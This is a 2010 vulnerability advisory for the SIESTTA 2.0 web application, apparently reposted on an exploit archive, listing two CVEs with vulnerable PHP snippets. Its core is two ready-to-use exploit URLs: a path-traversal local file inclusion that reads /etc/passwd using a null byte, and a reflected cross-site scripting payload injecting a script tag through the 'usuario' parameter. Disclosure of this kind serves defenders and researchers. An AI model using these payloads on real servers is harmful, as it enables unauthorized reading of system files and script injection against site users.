SIESTTA 2.0 (LFI/XSS) Multiple Vulnerabilities

2010.05.06
Credit: Jose Luis Gongora Fernandez 'aka' JosS
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2010-1710 | CVE-2010-1711
CWE: CWE-22
CWE-79

#################################################################### # SIESTTA 2.0 (LFI/XSS) Multiple Vulnerabilities # download: http://ramoncastro.es/siestta_old/ # # Author: Jose Luis Gongora Fernandez 'aka' JosS # mail: sys-project[at]hotmail[dot]com # site: http://www.hack0wn.com/ # team: Spanish Hackers Team - [SHT] # # Hack0wn Security Project!! # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. # #################################################################### # # "need" register_globals = On # #################################################################### - [#LFI] <login.php> <?php require('idioma/'.$idioma.''); ... ?> !EXPLOIT: /login.php?idioma=/../../../../../../../../../../../etc/passwd%00 - [#XSS] <carga_foto_al.php> <? ... $usuario = $_GET['usuario']; $imagen = 'admin/fotos_al/'.$usuario.'.jpg'; echo '<p style="text-align:center;"> <img class="foto" src="'.$imagen.'" alt="'.$usuario.'" /></p> ... ?> !EXPLOIT: /carga_foto_al.php?usuario=<script>alert("JosS - Hack0wn");</script> __h0__ _________________________________________________________________ Aprende los trucos de Windows 7 con la gente que ya lo han probado Windows 7. http://www.sietesunpueblodeexpertos.com/index_windows7.html

References:

http://xforce.iss.net/xforce/xfdb/57899
http://www.securityfocus.com/bid/39526
http://www.osvdb.org/63836
http://www.exploit-db.com/exploits/12260
http://secunia.com/advisories/39453
http://packetstormsecurity.org/1004-exploits/siestta-lfixss.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top